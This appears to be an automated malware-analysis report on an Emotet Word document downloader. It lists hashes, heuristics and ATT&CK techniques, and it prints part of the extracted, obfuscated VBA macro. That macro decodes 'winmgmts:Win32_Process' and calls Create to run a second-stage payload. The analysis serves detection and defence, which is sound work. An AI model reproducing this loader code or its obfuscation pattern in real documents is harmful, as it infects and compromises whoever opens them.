Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d07f5faa13f8bdbb…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 95.5 KB
Created: 2019-10-03 13:38:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 39283b8d17e7b266ccb3a5a01b70e163
SHA-1: 2f8b5f20881426720ed4b6f5f0dd386f572ccd90
SHA-256: d07f5faa13f8bdbbf12b03c1a1be3dfa5731dada0d1ac005b31d78fa2db6db77
Risk score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Reverse Engineer

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-10019714-0. High-severity heuristics indicate the presence of an obfuscated auto-executing VBA loader that uses CreateObject and Shell execution. The VBA macro code, while partially truncated and obfuscated, contains references to URLs that are likely used to download additional malicious content. The primary function appears to be the execution of a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10019714-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10019714-0
  • VBA macros detected (severity: medium, 4 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (severity: critical, rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13886 bytes
SHA-256: b93dbbfa49075d2644fb361f704dfe551feff5e07660a823357dd502353688aa
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Buckinghamshirezio"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Chiefror, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Operationsriv, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Datanpv, 2, 2, MSForms, TextBox"
Attribute VB_Control = "unleashiqq, 3, 3, MSForms, TextBox"
Attribute VB_Control = "indexics, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Saudi_Riyalwjt, 5, 5, MSForms, TextBox"

Attribute VB_Name = "Ergonomicawc"
Function eenablejkn()
On Error Resume Next
   'https://www.microsoft.com/Cottoniwl
inputrpi = "Licensed Cotton Bacon North Carolina Point interactive Toys & Computers District Road bypass time-frame even-keeled Focused Usability backing up repurpose"
'Equatorial Guinea Intelligent capacitor Agent Danish Krone lavender RAM program Specialist
'https://www.microsoft.com/Metricspjm
While inputrpi = wdXMLValidationStatusOK
'open-source Kids, Movies & Beauty Awesome Reactive Buckinghamshire benchmark solution capacity Serbian Dinar Qatar copying Handmade
Berkshirevwu = CDate(192)
Cambridgeshireban = Technicianbrv
Generic_Frozen_Chickenkwi = CDbl(963)
Technicianqlb = 591
motivatingwlq = 621
USBiir = Atn(Moroccocbv)
'hub Rubber US Dollar Cuba Metal Credit Card Account Baby, Tools & Shoes
Wend
'teal e-business generating grid-enabled Gorgeous Money Market Account Chad Luxembourg 24/7 Investment Account
tertiaryjvk = Cambridgeshirekoq + "p" + dynamicsmh(Buckinghamshirezio.indexics + Buckinghamshirezio.Datanpv) 'Zimbabwe Dollar Finland Small Savings Account deposit Music Technician Handcrafted Fresh Shoes IB Rubber circuit Intranet
   'https://www.microsoft.com/solutionsjjz
inputrpi = "Burkina Faso Metal Burgs Senior magenta Soft mobile Licensed Frozen Ball Savings Account Montana next-generation Buckinghamshire alarm Isle"
'redundant Practical Wooden Car Lao People's Democratic Republic Wall Upgradable Loop Arkansas invoice navigate Kip regional
'https://www.microsoft.com/Refined_Soft_Glovesuac
While inputrpi = wdXMLValidationStatusOK
'Small Soft Gloves olive definition Buckinghamshire International Money Market Account parsing heuristic Philippine Peso Investor Refined Concrete Shirt Licensed AGP US Dollar
Bedfordshirewjw = CDate(559)
Rusticroh = Sleek_Granite_Chickenstj
Cape_Verdecui = CDbl(854)
Gorgeouswkk = 692
plumlkb = 689
hapticjub = Atn(wq1080pkaq)
'Cotton partnerships cohesive transitional CFP Franc Points Texas
Wend
'Greens Licensed Gorgeous calculate ADP Factors Licensed Rubber Shoes communities
targetwwz = programrii
Set Digitizedvfc = CreateObject(dynamicsmh(dynamicsmh(CStr(547504 + 66 - 547504) + "666666winmgmts:666666Win32_Proc6666ess")))
targetwwz = targetwwz + Digitizedvfc.Create#(tertiaryjvk, Datazsl, Engineeriwd, Interactionsviw)
   'https://www.microsoft.com/Investment_Accountslm
inputrpi = "Rubber Fork Producer protocol Licensed Frozen Chips Practical Plastic Table Assistant bandwidth"
'Practical Rubber Shoes Uzbekistan Incredible Wooden Shoes sticky Denmark Afghanistan Devolved viral Small Steel Chair Silver internet solution Credit Card Account synthesizing
'https://www.microsoft.com/connectingkur
While inputrpi = wdXMLValidationStatusOK
'copy Handcrafted Steel Computer driver Key SMS Rue Valley Product Licensed Granite Pants Rustic Cotton Towels calculate payment
dynamicbkr = CDate(433)
Berkshireikb = Ergonomic_Steel_Mousewiz
generatevsq = CDbl(139)
Delawaretcs = 142
connectingaib = 935
Underpasstdc = Atn(Bedfordshirelfv)
'Pataca Home Loan Account Extensions Licensed Frozen Keyboard Harbor calculate Plastic
Wend
'Wisconsin Islands Money Market Account Center fault-tolerant superstructure hierarchy leading-edge collaborative
End Function

Attribute VB_Name = "New_Israeli_Sheqelsjp"
Function Engineeriwd()
On Error Resume Next
   'https://www.microsoft.com
... (truncated)